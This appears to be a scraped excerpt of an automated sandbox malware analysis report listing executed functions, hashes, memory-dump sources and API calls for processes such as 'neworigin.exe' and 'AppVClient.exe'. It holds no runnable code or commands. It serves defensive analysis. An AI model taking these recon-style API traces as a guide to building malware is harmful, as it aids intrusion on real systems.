Instruction Fuzzy Hash: F4E017708592549FC311DFB8E844E94BFB8EF0B219F0102DAE5288B2A2DB348944EB56

Function 022B6D40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1939839210.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_22b0000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f007b348a024abe5fb0ee598058e42d8639b2aab3c858efed00e9687ac035b9b
Instruction ID: 15e1a117c34d618c05e1021e22a96b8f766d0b9251475f6cbab00e732fa9d525
Opcode Fuzzy Hash: f007b348a024abe5fb0ee598058e42d8639b2aab3c858efed00e9687ac035b9b
Instruction Fuzzy Hash: D9E0CD3048D2840FC7159B987954CA87F14EF03308F251EDED150D709BD7109825D747

Function 022B7650 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1939839210.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_22b0000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3dd1eac0e0700adf00a2236c6065d623ad72a1d1f31eeeb9d42a4bc93dc7c7
Instruction ID: 407cf65be2e894ffac2051c8b68150aeb7a64caf73a4ff457fc1fd80fe08d20f
Opcode Fuzzy Hash: 2e3dd1eac0e0700adf00a2236c6065d623ad72a1d1f31eeeb9d42a4bc93dc7c7
Instruction Fuzzy Hash: 55C08070841208DBC314DFF8E805F55BB7CEB4231AF401199D50853240DB758540D799

Function 022B6D50 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1939839210.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_22b0000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2794d37b05ae46c28ebc3912353ac15495dc234b825307e362342e38a392b4
Instruction ID: d581108911907dac0ca84d825e96c0bb1c19598b3b385fdc823d39f57c7db8b4
Opcode Fuzzy Hash: 6a2794d37b05ae46c28ebc3912353ac15495dc234b825307e362342e38a392b4
Instruction Fuzzy Hash: 48C0807084120DDBC314DFD5E404F65B77CEB02305F0012A9E50853144EB714550D6AA

Analysis Process: AppVClient.exePID: 6800, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	97.9%
Signature Coverage:	4.3%
Total number of Nodes:	94
Total number of Limit Nodes:	10

Executed Functions

Function 00B752A0 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDefaultLangID.KERNELBASE ref: 00B753C4

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID: DefaultLangSystem
String ID:
API String ID: 706401283-0
Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction ID: ec068ce22cfa21bce38de050bb5f932b5818358cad611dedae57f049abad7fd5
Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction Fuzzy Hash: E641C5A180DE958FD736432448A42747BE0DB113E2F9EC5D6D4FF8A1F6E2D84C81936A

Function 00B90080 Relevance: 5.0, APIs: 3, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 00B903E0

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction ID: 2d91b10aa35703d2cac745044183ead5c0a82ce2fe72fe3cc192b67e27df37d5
Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction Fuzzy Hash: 07D1063152CB0D8FCB28FF58D8857EAB7E1FBA0310F5846AED846C3265DA74964586C2

Function 00B78070 Relevance: 4.7, APIs: 3, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction ID: 5930bc568993b4a95766668fff78e6b9a5c1642cea6e08f120931f75834597c0
Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction Fuzzy Hash: B361463068CA459FC7658B28889C3357BE0FB59360F98C6DAE47FD39A1DF244C459352

Function 00B75910 Relevance: 1.9, APIs: 1, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction ID: 3207053290701fbf9526482282ff434f60ff4b6a68a555dad520864c74726c4d
Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction Fuzzy Hash: 51F1193171CE488FCBA9A72C58813B977D1EB99310F5885FEE05EC3296DD649C06D382

Function 00B75B42 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction ID: 1eb005069438cc16bbb49d397f06436c86356e7e256c01735db068c38d64b78d
Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction Fuzzy Hash: 2D219F2020CF458FDB7B9B388888B7466D1EB54310F68C5E6847FCF2A2DAE48C449755

Function 00B75B09 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction ID: 584625b6a4da65aa77c361d93e6e842fda1500d9725b34882bf97d46de642cc0
Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction Fuzzy Hash: C801D23050DF468FEB765A348D987797BD0EB14324F2481EB88BFCA191EEE44901A752

Function 00B75B87 Relevance: 1.5, APIs: 1, Instructions: 23
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00B75B90
CreateThread.KERNELBASE ref: 00B75CDF

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction ID: be0951479a81d0ba9becdcd651e1a9ab4f05d961e865e3bab411bf4645999281
Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction Fuzzy Hash: 51E0863060DB448FDB6A9F245D503293AE5EB88310F1541DEC45ED72D1DFA919064786

Function 00B7599B Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcscpy.LIBCMT ref: 00B759D9

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID: wcscpy
String ID:
API String ID: 1284135714-0
Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction ID: 7bcdab300da469182f06ed70b3f72e17a2fc1182f3ce63ba0b938adf785ce788
Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction Fuzzy Hash: 8A01D67091DF84CFD6769B18448127976E1FB94320F28C5EA92AEC7192C9E44D00A342

Function 00B78090 Relevance: 1.3, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00B78186

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction ID: ca6242b5f98d80d8dc15360a26377ca9d8f2d775a86425cf0d59cb0fb8460d07
Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction Fuzzy Hash: 7BC08C719E89029A523A028C2C2F0F026C0C20E370FCCC0C68C3EF0E20DD248E039097

Function 00B7817F Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00B78186

Memory Dump Source

Source File: 0000000C.00000002.1900159844.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b70000_AppVClient.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction ID: 8587d28e17772083880ce630c401665a1d5c6db9ca240ad8216af06f1a6b2798
Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction Fuzzy Hash: D0C048A59D860986513A268C2C1E0A225D0861A770F8CC492AC3EBAA62D9684D4291A2

Analysis Process: neworigin.exePID: 7012, Parent PID: 5100COMMON

Executed Functions

Function 06B03178 Relevance: 8.0, Strings: 6, Instructions: 545COMMON

Download Yara Rule

Strings

$p, xrefs: 06B038A0
$p, xrefs: 06B038AC
$p, xrefs: 06B038D0
$p, xrefs: 06B03877
$p, xrefs: 06B038C4
$p, xrefs: 06B03883

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p
API String ID: 0-3402276426
Opcode ID: 3b8fc9b2f28cafac071e927b3a4cd9076a8620249e2fbf820478125167b1ca62
Instruction ID: bff5c279e1feee9621dde7c0a176069ffdc560b2e4201c93c76dadd416cf7bac
Opcode Fuzzy Hash: 3b8fc9b2f28cafac071e927b3a4cd9076a8620249e2fbf820478125167b1ca62
Instruction Fuzzy Hash: 67322E70E1075A8FDB14EB74C8946ADB7B2FFC9300F50D6AAD409A7254EF30A985CB90

Function 06B07E78 Relevance: 3.0, Strings: 2, Instructions: 476COMMON

Download Yara Rule

Strings

$p, xrefs: 06B08413
$p, xrefs: 06B0841F

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID: $p$$p
API String ID: 0-580715581
Opcode ID: c600060548bb7e6d21a0d2871c86f48e47447b7a258ee1e896b4e81a6a256101
Instruction ID: bb6b1d361e7cfd3dda411b6545db2351f8b9bfb709618562e13b92ab90a38f78
Opcode Fuzzy Hash: c600060548bb7e6d21a0d2871c86f48e47447b7a258ee1e896b4e81a6a256101
Instruction Fuzzy Hash: 8D02BF70B002159FEF54DB64D890BAEBBE6FF88310F1485A9D4159B394EB35ED42CB80

Function 02DDEA80 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

$p, xrefs: 02DDEB6E
Xp, xrefs: 02DDEB87

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID: Xp$$p
API String ID: 0-2855882018
Opcode ID: 5fd123e7941b656b47cfbe84a083eda9daff7fc2b408d4ac52464f4b4ec4fc55
Instruction ID: 51e1f9f4de8be02701053c6d56a46c376728aad958fddd2de0e5b1aed79ce957
Opcode Fuzzy Hash: 5fd123e7941b656b47cfbe84a083eda9daff7fc2b408d4ac52464f4b4ec4fc55
Instruction Fuzzy Hash: 5EB1C574B002188FDB19EB79985877E7BA7AFC8750B55852DE447DB388DE34CC028B91

Function 02DDAA43 Relevance: 2.8, Instructions: 2805COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455b57b7bec12e36418ee3cfa425538f35ec3b78d7e21761d7c48bfc6904d355
Instruction ID: 0d1c9e628e40ea0f9e6a6306ffb0bb2ec801b30c24970c0ae67e01097c4e9be9
Opcode Fuzzy Hash: 455b57b7bec12e36418ee3cfa425538f35ec3b78d7e21761d7c48bfc6904d355
Instruction Fuzzy Hash: F063CA31D10B1A8ADB11EF68C9446A9F7B1FF99300F51D79AE45867221FB70AAC4CF81

Function 02DD41C8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V#n, xrefs: 02DD447F

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID: \V#n
API String ID: 0-3691841082
Opcode ID: 4c31b2bd755147237efc53ec25e9bda1ef2d18c7a750c72fff04e952401e6ab6
Instruction ID: 19c9716bc2750eaaac05be437a96ada0693f9c7a12413e3d9872072b0b4f81aa
Opcode Fuzzy Hash: 4c31b2bd755147237efc53ec25e9bda1ef2d18c7a750c72fff04e952401e6ab6
Instruction Fuzzy Hash: E0B12BB0E006098FDF14CFA9D8857AEBBF2BF88314F148529D855A7394EB749845CF81

Function 02DD3E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\V#n, xrefs: 02DD40CB

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID: \V#n
API String ID: 0-3691841082
Opcode ID: e12205e39ec66da79762335ccc5abc52e294ecca0b2419960def29bd657eacbf
Instruction ID: fae8b657c84461a999b5b970e9da57313a88a29f901f81be9f85333b8ebf07ff
Opcode Fuzzy Hash: e12205e39ec66da79762335ccc5abc52e294ecca0b2419960def29bd657eacbf
Instruction Fuzzy Hash: 51914A70E00609DFDF14CFA9D9857AEBBF2AF88314F248129E415A7394EB749846CF91

Function 06B02350 Relevance: 1.0, Instructions: 1045COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb5714dab9d995d9b19bcdbaa8f53de10004db28f88f6bd17def14ca9b66a2a
Instruction ID: 830b5a58b807703c34b3b1c4541671529033df9038a50137e7ce1cba81bc02d4
Opcode Fuzzy Hash: 2fb5714dab9d995d9b19bcdbaa8f53de10004db28f88f6bd17def14ca9b66a2a
Instruction Fuzzy Hash: 1DA22674A002058FEBA4DF68C588B6DBBF2FB49314F5584A9D4099B3A5DB34ED86CF40

Function 06B066E8 Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a7a954dfc78fde88ae37593b8cfac7eeaaf3d5dc42a968824f278c5868ac47
Instruction ID: 6e4530b835c6ce1ee507c4ce58030cce95cd3b11150bf676d75ce33453350ebe
Opcode Fuzzy Hash: b9a7a954dfc78fde88ae37593b8cfac7eeaaf3d5dc42a968824f278c5868ac47
Instruction Fuzzy Hash: 32627E70A002158FEB58DB68D594BADBFF2EF88314F1485A9D406DB394EB35ED46CB80

Function 06B0C2A0 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5eedd23851e6856bd905379f329f7604089876ec519d148f14f43e7e13bfb3
Instruction ID: 96ad50d8ee471189c6bb90bcb507dc7e88b2384174f478e189e108a093aa4647
Opcode Fuzzy Hash: 8e5eedd23851e6856bd905379f329f7604089876ec519d148f14f43e7e13bfb3
Instruction Fuzzy Hash: F6326074A102099FEB64DB68D890BBEBFB2FB88310F108665D515DB3A5DB35EC41CB90

Function 06B0B32A Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43779b373c67078ef2fbad06d5c75bd81ba6aefbb185fe1fd6440b1aa0c59eb4
Instruction ID: a9975c59c321f3637f07c4917d0b624e305399aa72dce2bdd254318774f27436
Opcode Fuzzy Hash: 43779b373c67078ef2fbad06d5c75bd81ba6aefbb185fe1fd6440b1aa0c59eb4
Instruction Fuzzy Hash: 87226DB0E102099BEF64CB68C4907ADBFB2EB49310F2495AAD415EB3D5DB36DC81CB51

Function 06B056B8 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b571dfd0af2bf37195e098d7959989fe547b376779a1345630719bdaef0be192
Instruction ID: d94a8b5a7ff953572dba6e8b1c49e951052e03e582d39cea6fc6334a89d20126
Opcode Fuzzy Hash: b571dfd0af2bf37195e098d7959989fe547b376779a1345630719bdaef0be192
Instruction Fuzzy Hash: 6412C1B2E002059BEF74DB64D984B6EBFA2EB84310F2484AAD9559B785DA34DC41CF90

Function 02DDDF00 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e875b82081193aed0f4d4ddc9a3e2eb38408f1b2c2b4d97bb3a4a18abecbab1
Instruction ID: 4450d0d4de6931e82d37ce9fa82620b30135978f2f4121f4e7636ae822d7d472
Opcode Fuzzy Hash: 3e875b82081193aed0f4d4ddc9a3e2eb38408f1b2c2b4d97bb3a4a18abecbab1
Instruction Fuzzy Hash: 20D1BD71B006069FDB25DB68D880B7EBBB6FB84310F208569E416DB395DB31EC42CB91

Function 02DD4A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1384ddd244c2471f0d8c649d1f26cd3ec1bea9227243408ae4dad3b8ccddca5
Instruction ID: 75d8eb490b15f75cb1d6a1a981f6f268a8b3e12e43bdbe49f04572b175b02dd8
Opcode Fuzzy Hash: a1384ddd244c2471f0d8c649d1f26cd3ec1bea9227243408ae4dad3b8ccddca5
Instruction Fuzzy Hash: A8B15C70E006098FDB10CFA9D8857AEBBF2AF88314F258529D855EB394EB749C45CF91

Function 06B0ADD0 Relevance: 10.4, Strings: 8, Instructions: 392COMMON

Download Yara Rule

Strings

$p, xrefs: 06B0AEF1
$p, xrefs: 06B0AF50
$p, xrefs: 06B0AF44
$p, xrefs: 06B0AF7F
$p, xrefs: 06B0AF73
$p, xrefs: 06B0AF9C
$p, xrefs: 06B0AFA8
$p, xrefs: 06B0AEFD

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p$$p$$p
API String ID: 0-4214562277
Opcode ID: 6dd956936ace796bccf3e2fc1543a12d57490025c97b3b56a6c65a8a493bfbea
Instruction ID: 993c6e0a3fd442184ee4143d5fea4c89cc558faf22694bce21d5bafe9a1910d4
Opcode Fuzzy Hash: 6dd956936ace796bccf3e2fc1543a12d57490025c97b3b56a6c65a8a493bfbea
Instruction Fuzzy Hash: 76E16270E1030A8FDB54DB68D4906AEBFB2EF85300F248969D415EB395EB71DD46CB90

Function 06B0B760 Relevance: 8.0, Strings: 6, Instructions: 472COMMON

Download Yara Rule

Strings

$p, xrefs: 06B0BCB9
$p, xrefs: 06B0BD21
$p, xrefs: 06B0BCF9
$p, xrefs: 06B0BCC5
$p, xrefs: 06B0BCED
$p, xrefs: 06B0BD2D

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p
API String ID: 0-3402276426
Opcode ID: ab58876fe272040fd2061d0219a2d46f85372caff21831714e51a8f1c6e02acf
Instruction ID: 0b752cd343e58fc35001e398a54d4528359b5f8c9f96402e500453b31c51a6f6
Opcode Fuzzy Hash: ab58876fe272040fd2061d0219a2d46f85372caff21831714e51a8f1c6e02acf
Instruction Fuzzy Hash: 97026DB0E1020A8FEBA4DF68D4907ADBFB2FB45310F2095AAD415DB295DB32DD41CB91

Function 06B09250 Relevance: 5.2, Strings: 4, Instructions: 230COMMON

Download Yara Rule

Strings

$p, xrefs: 06B092D2
$p, xrefs: 06B092DE
$p, xrefs: 06B092A3
$p, xrefs: 06B09297

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: 3392e65d3f98954d9d24436e9602b557148f71c8deddba3c7a1046e0a9e52daa
Instruction ID: ed46901cceb1a6726830d2042049442d0ca6a2ede4ac58db1514ea2b7adef459
Opcode Fuzzy Hash: 3392e65d3f98954d9d24436e9602b557148f71c8deddba3c7a1046e0a9e52daa
Instruction Fuzzy Hash: 97912270B1021A8FDB54EB64D8907BEBBF2EF89210F1095A9C419EB395EB74DD41CB90

Function 06B0D060 Relevance: 4.6, Strings: 3, Instructions: 800COMMON

Download Yara Rule

Strings

$p, xrefs: 06B0D45F
$p, xrefs: 06B0D46B
$p, xrefs: 06B0D457

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID: $p$$p$$p
API String ID: 0-4193490398
Opcode ID: 3310ae6276db0d54b2b850d4fb5762dbc102a0de4da36fec1ce2ea7851a39f27
Instruction ID: b4fa5549c13e280ceaa999e3498ba7eb73ce543d79c3c96b6670638f2189709f
Opcode Fuzzy Hash: 3310ae6276db0d54b2b850d4fb5762dbc102a0de4da36fec1ce2ea7851a39f27
Instruction Fuzzy Hash: 7262333060030A8FDB59EF68D590A6EBBE2FF84314F249568D1059F3A9DB71ED46CB80

Function 02DDF0A8 Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

Tep, xrefs: 02DDF41C
Tep, xrefs: 02DDF285
PJDp, xrefs: 02DDF45D

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID: PJDp$Tep$Tep
API String ID: 0-2940362531
Opcode ID: b851ccd1363fbc877856b958329aa77d39e4711b9dad596c298af0baa8269c44
Instruction ID: e308e1231acd35ca7d670a0fc9b78b4718135481d9f40933ff246bc8882e202f
Opcode Fuzzy Hash: b851ccd1363fbc877856b958329aa77d39e4711b9dad596c298af0baa8269c44
Instruction Fuzzy Hash: 88E14C34A006059FDB28DFA8C59076E77B2FF89314F208569E806DB765CB75ED46CB80

Function 06B04C88 Relevance: 3.9, Strings: 3, Instructions: 186COMMON

Download Yara Rule

Strings

fp, xrefs: 06B04CB3
XPp, xrefs: 06B04DD9
\Op, xrefs: 06B04E63

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID: fp$XPp$\Op
API String ID: 0-95787013
Opcode ID: 3d809228a233045ef5650bb45d17b16be2d7678d122e82d8f621691753829659
Instruction ID: 94e959e3e70dd9bb88f583a8eba205290cf1c2c0561f7e194eea0204059142d8
Opcode Fuzzy Hash: 3d809228a233045ef5650bb45d17b16be2d7678d122e82d8f621691753829659
Instruction Fuzzy Hash: 66617F70F102199FEF58DBA4C8547AEBFF6FB88300F20846AD106AB395DB758C458B94

Function 02DD4810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\V#n, xrefs: 02DD487F
\V#n, xrefs: 02DD49D2

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID: \V#n$\V#n
API String ID: 0-3833938244
Opcode ID: cbc5b55bd3f9a571c9c06f94dc14b7793db4957ef5aa1c12d5bc42f408662d99
Instruction ID: ba61a26bae675decdbb383de000fd5d5f18e26ebd6e1c825681a64e73cab01db
Opcode Fuzzy Hash: cbc5b55bd3f9a571c9c06f94dc14b7793db4957ef5aa1c12d5bc42f408662d99
